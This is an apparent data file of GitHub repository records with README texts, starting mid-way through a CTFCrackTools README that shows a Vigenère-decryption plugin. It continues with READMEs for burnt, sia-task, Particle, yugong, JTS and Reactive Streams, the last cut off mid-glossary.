    ascii='ABCDEFGHIJKLMNOPQRSTUVWXYZ'
    keylen=len(key)
    ctlen=len(ciphertext)
    plaintext = ''
    i = 0
    while i < ctlen:
        j = i % keylen
        k = ascii.index(key[j])
        m = ascii.index(ciphertext[i])
        if m < k:
            m += 26
        plaintext += ascii[m-k]
        i += 1
    return plaintext

def author_info():
    info = {
        'name':'VigenereDecrypto',
        'author':'naiquan',
        'key':['key'],
        'describe':'VigenereDecrypto'
    }
    return info

def main(input,key):
    return vigenereDecrypto(input.replace(" ","").upper(),key.replace(" ","").upper())
```

Multi-parameter demo (register the parameters as a string array, as shown):

```python
#-*- coding:utf-8 -*-
# a multi-parameter demo
# a, b and c are the parameters to pass in; there is basically no limit on the count (untested)
def main(input,a,b,c):
    return 'input is %s,key a is %s,key b is %s,key c is %s'%(input,a,b,c)

# we want to store plugin developers' information in the program,
# so author_info must be defined to register it
def author_info():
    info = {
        "author":"0chen",
        "name":"test_version",
        "key":["a","b","c"],
        "describe":"plugin describe"
    }
    return info
```

## The author's ramblings

This tool was first released in 2016, when I was still in senior high school with neither the time nor the ability to maintain something with such a large audience. It has earned me thanks from many CTF beginners over the years. For the last two years I have been busy making a living and could hardly spare time for its development, yet many friends still reach me on QQ and WeChat with valuable suggestions, which is what keeps me updating from time to time.
I've noticed that many vendors in China include this tool in their must-have CTF kits. I'm very grateful for this kindness; it's because of them that tens of thousands of people use my tool. The CTF community keeps growing, and I hope this tool keeps being used along with it.

I played my first CTF in my second year of senior high and got utterly crushed. We noticed that the first-place team's write-up included a screenshot of this tool, which made me very happy. I hope this tool accompanies every CTFer's growth; if anything falls short, please leave your valuable feedback in a GitHub issue, and I will adopt it wherever I can.

I will keep this project open source, and vendors are welcome to keep shipping my tool as a beginner essential. Thank you all!

Also: the 米斯特 (Mist) security team is always looking for outstanding CTF players; if you plan to join and grow with our team, contact us at admin@hi-ourlife.com

## Older versions

The old versions differ from the new one only in the UI. The latest 4.0 abandons the much-criticized 3.0 UI and polishes the UI of 2.0, the version a survey found people liked most. I believe the old versions no longer need to exist, so the project has been set to private; if there is enough demand I will reopen it. Thanks, everyone.

~~[https://github.com/Acmesec/CTFCrackTools-V2](https://github.com/Acmesec/CTFCrackTools-V2)~~

## Donations

Our company takes on all kinds of security training and penetration testing; contact admin[#]hi-ourlife.com

![wechat](img/wechat.jpeg)
0
nandorojo/burnt
Crunchy toasts for React Native. 🍞
null
# 🍞 burnt Cross-platform toasts for React Native, powered by native elements. - [Install](#installation) - [Usage](#api) Now with Android, iOS & Web Support. ## Alerts https://user-images.githubusercontent.com/13172299/202289223-8a333223-3afa-49c4-a001-a70c76150ef0.mp4 ## ...and Toasts https://user-images.githubusercontent.com/13172299/231801324-3f0858a6-bd61-4d74-920f-4e77b80d26c1.mp4 ## ...and Web Support https://user-images.githubusercontent.com/13172299/236826405-b5f423bb-dafd-4013-a941-7accbea43c14.mp4 ## Context See this [Twitter thread](https://twitter.com/FernandoTheRojo/status/1592923529644625920). ## What This is a library with a `toast` and `alert` method for showing ephemeral UI. On iOS, it wraps [`SPIndicator`](https://github.com/ivanvorobei/SPIndicator) and [`AlertKit`](https://github.com/sparrowcode/AlertKit). On Android, it wraps `ToastAndroid` from `react-native`. `Burnt.alert()` falls back to `Burnt.toast()` on Android. This may change in a future version. On Web, it wraps [`sonner`](https://github.com/emilkowalski/sonner) by Emil Kowalski. Burnt works with both the old & new architectures. It's built on top of JSI, thanks to Expo's new module system. ## Features - Simple, imperative `toast` that uses **native** components under the hood, rather than using React state with JS-based UI. - Animated icons - iOS App Store-like `alert` popups - Overlays on top of native iOS modals - Loading alerts ## Modals Displaying toasts on top of modals has always been an issue in React Native. With Burnt, this works out of the box. https://user-images.githubusercontent.com/13172299/231801096-2894fbf3-4df7-45d7-9c72-f80d36fd45ef.mp4 ## Usage ```tsx import * as Burnt from "burnt"; Burnt.toast({ title: "Burnt installed.", preset: "done", message: "See your downloads.", }); ``` You can also `Burnt.alert()` and `Burnt.dismissAllAlerts()`. ## TODO - [x] iOS support - [x] Android support - [x] Custom iOS icons - [x] Web support ## Installation ```sh yarn add burnt ``` ### Expo Burnt likely requires Expo SDK 46+. ```sh npx expo install burnt expo-build-properties ``` Add the `expo-build-properties` plugin to your `app.json`/`app.config.js`, setting the deployment target to `13.0` (or higher): ```js export default { plugins: [ [ "expo-build-properties", { ios: { deploymentTarget: "13.0", }, }, ], ], }; ``` Then, you'll need to rebuild your dev client. Burnt will not work in Expo Go. ```sh npx expo prebuild --clean npx expo run:ios ``` The config plugin ensures that your iOS app has at least iOS 13 as a deployment target, which is required for Burnt (as well as Expo SDK 47+). ### Web Support To enable Web support, you need to add the `<Toaster />` to the root of your app. If you're using Next.js, add this into your `_app.tsx` component. ```tsx // _app.tsx import { Toaster } from "burnt/web"; function MyApp({ Component, pageProps }) { return ( <> <Component {...pageProps} /> <Toaster position='bottom-right' /> </> ); } ``` If you're using Next.js, add `burnt` to your `transpilePackages` in `next.config.js`. ```tsx /** @type {import('next').NextConfig} */ const nextConfig = { transpilePackages: [ // Your other packages here "burnt" ] } ``` To configure your `Toaster`, please reference the `sonner` [docs](https://github.com/emilkowalski/sonner/tree/main#theme). 
### Expo Web If you're using Expo Web, you'll need to add the following to your `metro.config.js` file: ```js // Learn more https://docs.expo.io/guides/customizing-metro const { getDefaultConfig } = require("expo/metro-config"); const config = getDefaultConfig(__dirname); // --- burnt --- config.resolver.sourceExts.push("mjs"); config.resolver.sourceExts.push("cjs"); // --- end burnt --- module.exports = config; ``` ### Plain React Native ```sh pod install ``` ### Solito ```sh cd applications/app expo install burnt expo-build-properties npx expo prebuild --clean npx expo run:ios cd ../.. yarn ``` Be sure to also follow the [expo](#expo) instructions and [web](#web-support) instructions. ## API ### `toast` https://user-images.githubusercontent.com/13172299/202275423-300671e5-3918-4d5d-acae-0602160de252.mp4 `toast(options): Promise<void>` ```tsx Burnt.toast({ title: "Congrats!", // required preset: "done", // or "error", "none", "custom" message: "", // optional haptic: "none", // or "success", "warning", "error" duration: 2, // duration in seconds shouldDismissByDrag: true, from: "bottom", // "top" or "bottom" // optionally customize layout layout: { iconSize: { height: 24, width: 24, }, }, icon: { ios: { // SF Symbol. For a full list, see https://developer.apple.com/sf-symbols/. name: "checkmark.seal", color: "#1D9BF0", }, web: <Icon />, }, }); ``` ### `alert` https://user-images.githubusercontent.com/13172299/202275324-4f6cb5f5-a103-49b5-993f-2030fc836edb.mp4 _The API changed since recording this video. It now uses object syntax._ `alert(options): Promise<void>` ```tsx import * as Burnt from "burnt"; export const alert = () => { Burnt.alert({ title: "Congrats!", // required preset: "done", // or "error", "heart", "custom" message: "", // optional duration: 2, // duration in seconds // optionally customize layout layout: { iconSize: { height: 24, width: 24, }, }, icon: { ios: { // SF Symbol. For a full list, see https://developer.apple.com/sf-symbols/. name: "checkmark.seal", color: "#1D9BF0", }, web: <Icon />, }, }); }; ``` On Web, this will display a regular toast. This may change in the future. ### `dismissAllAlerts()` Does what you think it does! In the future, I'll allow async spinners for promises, and it'll be useful then. ## Contribute ```sh yarn build cd example yarn npx expo run:ios # do this again whenever you change native code ``` You can edit the iOS files in `ios/`, and then update the JS accordingly in `src`. ## Thanks Special thanks to [Tomasz Sapeta](https://twitter.com/tsapeta) for offering help along the way. Expo Modules made this so easy to build, and all with Swift – no Objective C. It's my first time writing Swift, and it was truly a breeze.
0
siaorg/sia-task
A microservice task scheduling framework
null
## 关于我们 * 邮件交流:sia.list@creditease.cn * 提交issue: * 微信交流: <img src="docs/images/newlog.jpeg" width="30%" height="30%"> 微服务任务调度平台 === [使用指南](USERSGUIDE.md) </br> [开发指南](DEVELOPGUIDE.md) </br> [部署指南](DEPLOY.md)</br> [Demo](FASTSTART.md)</br> 背景 --- 无论是互联网应用或者企业级应用,都充斥着大量的批处理任务。我们常常需要一些任务调度系统帮助我们解决问题。随着微服务化架构的逐步演进,单体架构逐渐演变为分布式、微服务架构。在此的背景下,很多原先的任务调度平台已经不能满足业务系统的需求。于是出现了一些基于分布式的任务调度平台。这些平台各有其特点,但各有不足之处,比如不支持任务编排、与业务高耦合、不支持跨平台等问题。不是非常符合公司的需求,因此我们开发了微服务任务调度平台(SIA-TASK)。 SIA是我们公司基础开发平台Simple is Awesome的简称,SIA-TASK(微服务任务调度平台)是其中的一项重要产品,SIA-TASK契合当前微服务架构模式,具有跨平台,可编排,高可用,无侵入,一致性,异步并行,动态扩展,实时监控等特点。 Introduction --- A lot of batch tasks need to be processed by task scheduling systems. The single architectures are evolving towards distributed ones. We often need distributed task scheduling platforms to handle the needs of business systems. But such platforms may not support task scheduling across OS or are coupled with business features. We therefore decided to develop SIA-TASK. SIA (Simple is Awesome) is our basic development platform. SIA-TASK is one of the key products of SIA and can work across OS. Its features include task scheduling, high availability, non-invasiveness, consistency, asynchronous concurrent processing, dynamic scale-out and real-time monitoring, etc. 项目简介 --- SIA-TASK是任务调度的一体式解决方案。对任务进行元数据采集,然后进行任务可视化编排,最终进行任务调度,并且对任务采取全流程监控,简单易用。对业务完全无侵入,通过简单灵活的配置即可生成符合预期的任务调度模型。 SIA-TASK借鉴微服务的设计思想,获取分布在每个任务执行器上的任务元数据,上传到任务注册中心。利用在线方式进行任务编排,可动态修改任务时钟,采用HTTP作为任务调度协议,统一使用JSON数据格式,由调度中心进行时钟解析,执行任务流程,进行任务通知。 Overview --- SIA-TASK is an integrated non-invasive task scheduling solution. It collects task metadata and then visualizes and schedules the tasks. The scheduled tasks are monitored throughout the whole process. An ideal task scheduling model can be generated after simple and flexible configuration. SIA-TASK collects task metadata on all executers and upload the data to the registry. The tasks are scheduled online using JSON with HTTP as the protocol. The scheduling center parses the clock, executes tasks and sends task notifications. 关键术语 --- * 任务(Task): 基本执行单元,执行器对外暴露的一个HTTP调用接口; * 作业(Job): 由一个或者多个存在相互逻辑关系(串行/并行)的任务组成,任务调度中心调度的最小单位; * 计划(Plan): 由若干个顺序执行的作业组成,每个作业都有自己的执行周期,计划没有执行周期; * 任务调度中心(Scheduler): 根据每个的作业的执行周期进行调度,即按照计划、作业、任务的逻辑进行HTTP请求; * 任务编排中心(Config): 编排中心使用任务来创建计划和作业; * 任务执行器(Executer): 接收HTTP请求进行业务逻辑的执行; * Hunter:Spring项目扩展包,负责执行器中的任务抓取,上传注册中心,业务可依赖该组件进行Task编写。 Terms --- * Task: the basic execution unit and the HTTP call interface * Job: the minimum scheduled unit that is composed of one or more (serial/concurrent) tasks * Plan: the composition of several serial jobs with no execution cycle * Scheduler: sends HTTP requests based on the logic of the plans, jobs and tasks * Config: creates plans and jobs with tasks * Executer: receives HTTP requests and executes the business logic * Hunter: fetches tasks, uploads metadata and scripts business tasks 微服务任务调度平台的特性 --- * 基于注解自动抓取任务,在暴露成HTTP服务的方法上加入@OnlineTask注解,@OnlineTask会自动抓取方法所在的IP地址,端口,请求路径,请求方法,请求参数格式等信息上传到任务注册中心(zookeeper),并同步写入持久化存储中,此方法即任务; * 基于注解无侵入多线程控制,单一任务实例必须保持单线程运行,任务调度框架自动拦截@OnlineTask注解进行单线程运行控制,保持在一个任务运行时不会被再次调度。而且整个控制过程对开发者完全无感知。 * 调度器自适应任务分配,任务执行过程中出现失败,异常时。可以根据任务定制的策略进行多点重新唤醒任务,保证任务的不间断执行。 * 高度灵活任务编排模式,SIA-TASK的设计思想是以任务为原子,把多个任务按照执行的关系组合起来形成一个作业。同时运行时分为任务调度中心和任务编排中心,使得作业的调度和作业的编排分隔开来,互不影响。在我们需要调整作业的流程时,只需要在编排中心进行处理即可。同时编排中心支持任务按照串行,并行,分支等方式组织关系。在相同任务不同任务实例时,也支持多种调度方式进行处理。 Features --- * Annotation-based automatic task fetching. Add @OnlineTask to the HTTP method. 
@OnlineTask would fetch and upload the IP address, port, request path, and request parameter format to the registry (Zookeeper) while writing the information into the persistent storage. A hedged sketch of such an annotated method follows at the end of this record.
* Annotation-based non-invasive multi-threading control. The scheduler automatically intercepts @OnlineTask for single-threading control and ensures that the running task would not be scheduled again. The whole process is non-invasive.
* Self-adaptive task scheduling. Tasks can be woken up based on the custom strategies when execution failure happens.
* Flexible task configuration. SIA-TASK is designed to group several logically related tasks into a job. The Scheduler and the Config schedule and configure jobs independently. The Config allows tasks to be organized in series, concurrently or as branches. Instances of the same task can be scheduled differently.

微服务任务调度平台设计 --- SIA-TASK主要分为五个部分: * 任务执行器 * 任务调度中心 * 任务编排中心 * 任务注册中心(zookeeper) * 持久存储(Mysql)

SIA-TASK includes the following components: * Executer * Scheduler * Config * Registry (Zookeeper) * Persistent storage (MySQL)

![逻辑架构图](docs/images/sia_task1.png)

SIA-TASK的主要运行逻辑: 1. 通过注解抓取任务执行器中的任务上报到任务注册中心 2. 任务编排中心从任务注册中心获取数据进行编排保存入持久化存储 3. 任务调度中心从持久化存储获取调度信息 4. 任务调度中心按照调度逻辑访问任务执行器

How SIA-TASK works: 1. Fetch and upload annotated tasks to the registry 2. The Config obtains data from the registry for scheduling and persistent storage 3. The Scheduler acquires data from the persistent storage 4. The Scheduler accesses the task executors following the scheduling logic

![逻辑架构图](docs/images/sia_task2.png)

UI预览 (UI preview) ---

首页提供多维度监控 * 调度器信息:展示调度器信息(负载能力,预警值),以及作业分布情况。 * 调度信息:展示调度中心触发的调度次数,作业、任务多维度调度统计。 * 对接项目统计:对使用项目的系统进行统计,作业个数,任务个数等等。

Homepage * Scheduler: loading capacity, alarm value and job distribution * Scheduling: scheduling frequency, job metrics and task metrics * Active users: job count and task count of active users

![首页](docs/images/index.png) </br>

调度监控提供对已提交的作业进行实时监控展示 * 作业状态实时监控:以项目组为单位面板,展示作业运行时状态。 * 实时日志关联:可以通过涂色状态图标进行日志实时关联展示。

Scheduling Monitor: real-time monitoring over submitted jobs * Real-time job monitoring: runtime status of jobs by project group * Real-time log correlation: logs can be correlated and displayed in real time via the colored status icons

![调度监控](docs/images/scheduling-monitoring.png) </br>

任务管理:提供任务元数据的相关操作 * 任务元数据录入:手动模式的任务,可在此进行录入。 * 任务连通性测试:提供任务连通性功能测试。 * 任务元数据其他操作:修改,删除。

Task Manager: task metadata operation * Metadata entry: enter the metadata of manual tasks * Connectivity test: test the connectivity of tasks * Modification and deletion

![Task管理](docs/images/Task-management.png) ![Task管理](docs/images/user-handbook_taskMg5.png) </br>

Job管理:提供作业相关操作 * 任务编排:进行作业的编排。 * 发布作业: 作业的创建,修改,以及发布。 * 级联设置:提供存在时间依赖的作业设置。

Job Manager: job operations * Task configuration: configure jobs * Job release: create, modify and release jobs * Cascading setting: set time-dependent jobs

![Job管理](docs/images/Job-management.png) </br>

日志管理 Log Manager ![Job管理](docs/images/user-handbook_log1.png)

开源地址 (Source repository) --- * [https://github.com/siaorg/sia-task](https://github.com/siaorg/sia-task)

## 其他说明 (Other notes)

### 关于编译代码 (About building)
* 建议使用Jdk1.8以上,JDK 1.8 or later version is recommended.

### 版本说明 (Version)
* 建议版本1.0.0,SIA-TASK 1.0.0 is recommended.

### 版权说明 (License)
* 自身使用 Apache v2.0 协议,SIA-TASK uses Apache 2.0.

### 其他相关资料 (Other resources)

## SIA相关开源产品链接 (SIA-related open-source products):
+ [微服务路由网关 (microservice routing gateway)](https://github.com/siaorg/sia-gateway)
+ [Rabbitmq队列服务PLUS (RabbitMQ queue service PLUS)](https://github.com/siaorg/sia-rabbitmq-plus)

(to be added)
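The features above explain that a task is simply a method exposed over HTTP and annotated with @OnlineTask. As a hedged sketch only: the annotation's real package path and attributes live in the sia-task Hunter module and may differ from what is assumed below; the Spring annotations are standard. An executor method might look like this:

```java
// NOTE: this import path is an assumption for illustration; check the
// sia-task Hunter module for the real @OnlineTask location.
import com.sia.hunter.annotation.OnlineTask;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.springframework.web.bind.annotation.RestController;

@RestController
public class DemoTaskController {

    // @OnlineTask marks this HTTP method as a schedulable task: the Hunter
    // component fetches its IP, port, request path and parameter format and
    // uploads them to the registry (Zookeeper). It also enforces the
    // single-threaded execution described above.
    @OnlineTask
    @PostMapping("/demo-task")
    public String demoTask(@RequestBody String input) {
        // Business logic goes here; SIA-TASK uses JSON over HTTP throughout.
        return "{\"status\":\"success\",\"result\":\"handled:" + input + "\"}";
    }
}
```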
0
JeasonWong/Particle
A cool animation that can be used in a splash screen or anywhere else.
null
## What's Particle?

It's a cool animation that can be used in a splash screen or anywhere else.

## Demo

![Markdown](https://raw.githubusercontent.com/jeasonwong/Particle/master/screenshots/particle.gif)

## Article

[手摸手教你用Canvas实现简单粒子动画](http://www.wangyuwei.me/2016/08/29/%E6%89%8B%E6%91%B8%E6%89%8B%E6%95%99%E4%BD%A0%E5%AE%9E%E7%8E%B0%E7%AE%80%E5%8D%95%E7%B2%92%E5%AD%90%E5%8A%A8%E7%94%BB/) (a hands-on guide to building a simple particle animation with Canvas)

## Attributes

|name|format|description|中文解释|
|:---:|:---:|:---:|:---:|
| pv_host_text | string |set left host text|设置左边主文案|
| pv_host_text_size | dimension |set host text size|设置主文案的大小|
| pv_particle_text | string |set right particle text|设置右边粒子上的文案|
| pv_particle_text_size | dimension |set particle text size|设置粒子上文案的大小|
| pv_text_color | color |set host text color|设置左边主文案颜色|
| pv_background_color | color |set background color|设置背景颜色|
| pv_text_anim_time | integer |set particle text duration|设置粒子上文案的运动时间|
| pv_spread_anim_time | integer |set particle text spread duration|设置粒子上文案的伸展时间|
| pv_host_text_anim_time | integer |set host text displacement duration|设置左边主文案的位移时间|

## Usage

#### Define your ParticleView in your xml:

```xml
<me.wangyuwei.particleview.ParticleView
    android:layout_width="match_parent"
    android:layout_height="match_parent"
    pv:pv_background_color="#2E2E2E"
    pv:pv_host_text="github"
    pv:pv_host_text_size="14sp"
    pv:pv_particle_text=".com"
    pv:pv_particle_text_size="14sp"
    pv:pv_text_color="#FFF"
    pv:pv_text_anim_time="3000"
    pv:pv_spread_anim_time="2000"
    pv:pv_host_text_anim_time="3000" />
```

#### Start the animation:

```java
mParticleView.startAnim();
```

#### Add an animation listener to receive the end callback:

```java
mParticleView.setOnParticleAnimListener(new ParticleView.ParticleAnimListener() {
    @Override
    public void onAnimationEnd() {
        Toast.makeText(MainActivity.this, "Animation is End", Toast.LENGTH_SHORT).show();
    }
});
```

## Import

Step 1. Add it in your project's build.gradle at the end of repositories:

```gradle
repositories {
    maven { url 'https://dl.bintray.com/wangyuwei/maven' }
}
```

Step 2. Add the dependency:

```gradle
dependencies {
    compile 'me.wangyuwei:ParticleView:1.0.4'
}
```

### About Me

[Weibo](http://weibo.com/WongYuwei) [Blog](http://www.wangyuwei.me)

### QQ Group

Discussion is welcome: **479729938**

## **License**

```license
Copyright [2016] [JeasonWong of copyright owner]

Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at

   http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
```
0
alibaba/yugong
Alibaba's data migration and synchronization tool for moving off Oracle (full + incremental; targets MySQL/DRDS)
null
## Background

In 2008, Alibaba began trying to run its business on MySQL and developed MySQL-related middleware and tools, Cobar/TDDL (now the Alibaba Cloud DRDS product), solving the scalability problems that single-instance Oracle could not satisfy. This also set off a wave of "de-IOE" projects. The yugong project was born out of that effort: its goal is to help users migrate their data from Oracle to MySQL, an important step in moving off IOE.

## Project Overview

Name: yugong
Meaning: from the fable "Yugong moves the mountains"
Language: pure Java
Positioning: database migration (currently mainly supports Oracle / MySQL / DRDS)

## Migration Process

The whole data migration process consists of two parts:
1. Full migration
2. Incremental migration

![](https://camo.githubusercontent.com/9a9cc09c5a7598239da20433857be61c54481b9c/687474703a2f2f646c322e69746579652e636f6d2f75706c6f61642f6174746163686d656e742f303131352f343531312f31306334666134632d626634342d333165352d623531312d6231393736643164373636392e706e67)

Process description:
1. Collect incremental data (create incremental materialized views on the Oracle tables)
2. Perform the full copy
3. Perform the incremental copy (data verification can run in parallel)
4. Stop writes on the source database and switch over to the new database

## Architecture

![](http://dl2.iteye.com/upload/attachment/0115/5473/8532d838-d4b2-371b-af9f-829d4127b1b8.png)

Notes:
1. One JVM container corresponds to multiple instances; each instance corresponds to the migration task of one table
2. An instance consists of three parts:
   a. extractor (extracts data from the source database; full and incremental implementations)
   b. translator (applies custom transformations to the source data according to the needs of the target database)
   c. applier (writes the data to the target database; full / incremental / comparison implementations)

## Design

[DevDesign](https://github.com/alibaba/yugong/wiki/DevDesign)

## Quick Start

[QuickStart](https://github.com/alibaba/yugong/wiki/QuickStart)

## Operations

[AdminGuide](https://github.com/alibaba/yugong/wiki/AdminGuide)

## Performance Report

[Performance](https://github.com/alibaba/yugong/wiki/Performance)

## Resources

1. Introductory yugong slides: [ppt](https://github.com/alibaba/yugong/blob/master/docs/yugong_Intro.ppt?raw=true)
2. [DRDS, the distributed relational database service](https://www.aliyun.com/product/drds) (an evolution of Alibaba's Cobar/TDDL, based on MySQL sharding)

## Communication

1. See the wiki home page
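To make the extractor / translator / applier split above concrete, here is a minimal, self-contained sketch of the per-row transformation hook. All type names and signatures are illustrative assumptions for this explanation, not yugong's actual API:

```java
import java.util.HashMap;
import java.util.Map;

// Illustration of the pipeline described above: the extractor produces rows,
// a translator transforms each row, and the applier writes it to the target.
final class Row {
    final Map<String, Object> columns = new HashMap<>();
}

interface Translator {
    Row translate(Row source); // custom per-table transformation hook
}

public class PipelineSketch {
    public static void main(String[] args) {
        // Example custom rule: normalize a column while the row is copied
        // from the source (Oracle) to the target (MySQL/DRDS).
        Translator upperCaseName = source -> {
            source.columns.computeIfPresent("NAME", (k, v) -> v.toString().toUpperCase());
            return source;
        };

        Row row = new Row();
        row.columns.put("NAME", "yugong");
        System.out.println(upperCaseName.translate(row).columns); // {NAME=YUGONG}
    }
}
```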
0
locationtech/jts
The JTS Topology Suite is a Java library for creating and manipulating vector geometry.
computational-geometry geometric-algorithms geometry geometry-algorithms geometry-library gis java java-library jts jts-topology-suite ogc ogc-wkt triangulation voronoi
JTS Topology Suite ================== The JTS Topology Suite is a Java library for creating and manipulating vector geometry. It also provides a comprehensive set of geometry test cases, and the TestBuilder GUI application for working with and visualizing geometry and JTS functions. ![JTS logo](jts_logo.png) [![Travis Build Status](https://api.travis-ci.org/locationtech/jts.svg)](http://travis-ci.org/locationtech/jts) [![GitHub Action Status](https://github.com/locationtech/jts/workflows/GitHub%20CI/badge.svg)](https://github.com/locationtech/jts/actions) [![Join the chat at https://gitter.im/locationtech/jts](https://badges.gitter.im/locationtech/jts.svg)](https://gitter.im/locationtech/jts?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge) JTS is a project in the [LocationTech](http://www.locationtech.org) working group of the Eclipse Foundation. ![LocationTech](locationtech_mark.png) ## Requirements Currently JTS targets Java 1.8 and above. ## Resources ### Code * [GitHub Repo](https://github.com/locationtech/jts) * [Maven Central group](https://mvnrepository.com/artifact/org.locationtech.jts) ### Websites * [LocationTech Home](https://locationtech.org/projects/technology.jts) * [GitHub web site](https://locationtech.github.io/jts/) ### Communication * [Mailing List](https://accounts.eclipse.org/mailing-list/jts-dev) * [Gitter Channel](https://gitter.im/locationtech/jts) ### Forums * [Stack Overflow](https://stackoverflow.com/questions/tagged/jts) * [GIS Stack Exchange](https://gis.stackexchange.com/questions/tagged/jts-topology-suite) ## License JTS is open source software. It is dual-licensed under: * [Eclipse Public License 2.0](https://www.eclipse.org/legal/epl-v20.html) * [Eclipse Distribution License 1.0](http://www.eclipse.org/org/documents/edl-v10.php) (a BSD Style License) See also: * [License details](LICENSES.md) * Licensing [FAQ](FAQ-LICENSING.md) ## Documentation * [**Javadoc**](https://locationtech.github.io/jts/javadoc) for the latest version of JTS * [**FAQ**](https://locationtech.github.io/jts/jts-faq.html) - Frequently Asked Questions * [**User Guide**](USING.md) - Installing and using JTS * [**Tools**](doc/TOOLS.md) - Guide to tools included with JTS * [**Developing Guide**](DEVELOPING.md) - how to build and develop for JTS * [**Upgrade Guide**](MIGRATION.md) - How to migrate from previous versions of JTS ## History * [**Version History**](https://github.com/locationtech/jts/blob/master/doc/JTS_Version_History.md) * History from the previous JTS SourceForge repo is in the branch [`_old/history`](https://github.com/locationtech/jts/tree/_old/history) * Older versions of JTS can be found on SourceForge * There is an archive of distros of older versions [here](https://github.com/dr-jts/jts-versions) ## Contributing If you are interested in contributing to JTS please read the [**Contributing Guide**](CONTRIBUTING.md). 
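For a quick taste of what "creating and manipulating vector geometry" looks like in code, here is a minimal example, assuming the `org.locationtech.jts:jts-core` artifact is on the classpath (the polygon coordinates are just sample data):

```java
import org.locationtech.jts.geom.Geometry;
import org.locationtech.jts.io.WKTReader;

public class JtsQuickExample {
    public static void main(String[] args) throws Exception {
        WKTReader reader = new WKTReader();

        // Two overlapping squares, expressed in OGC Well-Known Text.
        Geometry a = reader.read("POLYGON ((0 0, 10 0, 10 10, 0 10, 0 0))");
        Geometry b = reader.read("POLYGON ((5 5, 15 5, 15 15, 5 15, 5 5))");

        // Compute and print their overlap: a 5 x 5 square, printed as WKT.
        System.out.println(a.intersection(b));
    }
}
```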
## Downstream Projects ### Derivatives (ports to other languages) * [**GEOS**](https://trac.osgeo.org/geos) - C++ * [**NetTopologySuite**](https://github.com/NetTopologySuite/NetTopologySuite) - .NET * [**JSTS**](https://github.com/bjornharrtell/jsts) - JavaScript * [**dart_jts**](https://github.com/moovida/dart_jts) - Dart ### Via GEOS * [**Shapely**](https://github.com/Toblerity/Shapely) - Python wrapper of GEOS * [**R-GEOS**](https://cran.r-project.org/web/packages/rgeos/index.html) - R wrapper of GEOS * [**rgeo**](https://github.com/rgeo/rgeo) - Ruby wrapper of GEOS * [**GEOSwift**](https://github.com/GEOSwift/GEOSwift) - Swift library using GEOS There are many projects using GEOS - for a list see the [GEOS wiki](https://trac.osgeo.org/geos/wiki/Applications).
0
reactive-streams/reactive-streams-jvm
Reactive Streams Specification for the JVM
null
# Reactive Streams # The purpose of Reactive Streams is to provide a standard for asynchronous stream processing with non-blocking backpressure. The latest release is available on Maven Central as ```xml <dependency> <groupId>org.reactivestreams</groupId> <artifactId>reactive-streams</artifactId> <version>1.0.4</version> </dependency> <dependency> <groupId>org.reactivestreams</groupId> <artifactId>reactive-streams-tck</artifactId> <version>1.0.4</version> <scope>test</scope> </dependency> ``` ## Goals, Design and Scope ## Handling streams of data—especially “live” data whose volume is not predetermined—requires special care in an asynchronous system. The most prominent issue is that resource consumption needs to be carefully controlled such that a fast data source does not overwhelm the stream destination. Asynchrony is needed in order to enable the parallel use of computing resources, on collaborating network hosts or multiple CPU cores within a single machine. The main goal of Reactive Streams is to govern the exchange of stream data across an asynchronous boundary – think passing elements on to another thread or thread-pool — while ensuring that the receiving side is not forced to buffer arbitrary amounts of data. In other words, backpressure is an integral part of this model in order to allow the queues which mediate between threads to be bounded. The benefits of asynchronous processing would be negated if the backpressure signals were synchronous (see also the [Reactive Manifesto](http://reactivemanifesto.org/)), therefore care has been taken to mandate fully non-blocking and asynchronous behavior of all aspects of a Reactive Streams implementation. It is the intention of this specification to allow the creation of many conforming implementations, which by virtue of abiding by the rules will be able to interoperate smoothly, preserving the aforementioned benefits and characteristics across the whole processing graph of a stream application. It should be noted that the precise nature of stream manipulations (transformation, splitting, merging, etc.) is not covered by this specification. Reactive Streams are only concerned with mediating the stream of data between different [API Components](#api-components). In their development care has been taken to ensure that all basic ways of combining streams can be expressed. In summary, Reactive Streams is a standard and specification for Stream-oriented libraries for the JVM that - process a potentially unbounded number of elements - in sequence, - asynchronously passing elements between components, - with mandatory non-blocking backpressure. The Reactive Streams specification consists of the following parts: ***The API*** specifies the types to implement Reactive Streams and achieve interoperability between different implementations. ***The Technology Compatibility Kit (TCK)*** is a standard test suite for conformance testing of implementations. Implementations are free to implement additional features not covered by the specification as long as they conform to the API requirements and pass the tests in the TCK. ### API Components ### The API consists of the following components that are required to be provided by Reactive Stream implementations: 1. Publisher 2. Subscriber 3. Subscription 4. Processor A *Publisher* is a provider of a potentially unbounded number of sequenced elements, publishing them according to the demand received from its Subscriber(s). 
In response to a call to `Publisher.subscribe(Subscriber)` the possible invocation sequences for methods on the `Subscriber` are given by the following protocol: ``` onSubscribe onNext* (onError | onComplete)? ``` This means that `onSubscribe` is always signalled, followed by a possibly unbounded number of `onNext` signals (as requested by `Subscriber`) followed by an `onError` signal if there is a failure, or an `onComplete` signal when no more elements are available—all as long as the `Subscription` is not cancelled. #### NOTES - The specifications below use binding words in capital letters from https://www.ietf.org/rfc/rfc2119.txt ### Glossary | Term | Definition | | ------------------------- | ------------------------------------------------------------------------------------------------------ | | <a name="term_signal">Signal</a> | As a noun: one of the `onSubscribe`, `onNext`, `onComplete`, `onError`, `request(n)` or `cancel` methods. As a verb: calling/invoking a signal. | | <a name="term_demand">Demand</a> | As a noun, the aggregated number of elements requested by a Subscriber which is yet to be delivered (fulfilled) by the Publisher. As a verb, the act of `request`-ing more elements. | | <a name="term_sync">Synchronous(ly)</a> | Executes on the calling Thread. | | <a name="term_return_normally">Return normally</a> | Only ever returns a value of the declared type to the caller. The only legal way to signal failure to a `Subscriber` is via the `onError` method.| | <a name="term_responsivity">Responsivity</a> | Readiness/ability to respond. In this document used to indicate that the different components should not impair each other's ability to respond. | | <a name="term_non-obstructing">Non-obstructing</a> | Quality describing a method which is as quick to execute as possible—on the calling thread. This means, for example, avoids heavy computations and other things that would stall the caller´s thread of execution. | | <a name="term_terminal_state">Terminal state</a> | For a Publisher: When `onComplete` or `onError` has been signalled. For a Subscriber: When an `onComplete` or `onError` has been received.| | <a name="term_nop">NOP</a> | Execution that has no 